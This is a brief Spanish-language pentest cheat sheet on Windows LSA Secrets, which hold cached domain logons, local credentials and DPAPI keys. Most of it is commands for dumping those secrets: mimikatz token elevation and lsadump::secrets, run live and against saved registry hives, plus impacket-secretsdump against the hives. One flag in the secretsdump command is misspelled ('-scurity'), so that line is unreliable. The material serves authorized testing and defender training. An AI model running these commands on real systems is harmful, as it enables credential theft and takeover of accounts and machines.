# LSA Secrets

* Almacenamiento protegido donde se almacena la información crítica utilizada por el SYSTEM LSA. Contiene:
  * Registro de dominio en caché
  * Credenciales de usuario local
  * Clave de usuario y máquina DPAPI, etc.
*  Esto se puede encontrar en el Registro; sin embargo, se requiere el privilegio SYSTEM:
  \
  • SECURITY\Política\Secrets

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FD7KNoc6SnFRGt7JMI20X%2Fimage.png?alt=media&#x26;token=1d442084-0943-4331-890a-f68a78546e4f" alt=""><figcaption></figcaption></figure>

## Lsa Secrets: Dumping - Mimikatz - Online

```sh
./mimikatz.exe token::elevate
```

```sh
./mimikatz.exe lsadump::secrets
```

## Lsa Secrets: Dumping - Mimikatz - Offline

```sh
./mimikatz.exe lsadump::secrets /system:C:\hives\SystemHive.hiv /security:C:\hives\SecurityHive.hiv
```

## Lsa Secrets: Dumping - secretsdump

```sh
impacket-secretsdump -scurity "C:\hives\SecurityHive.hiv" -system "C:\hives\SystemHive.hiv"
```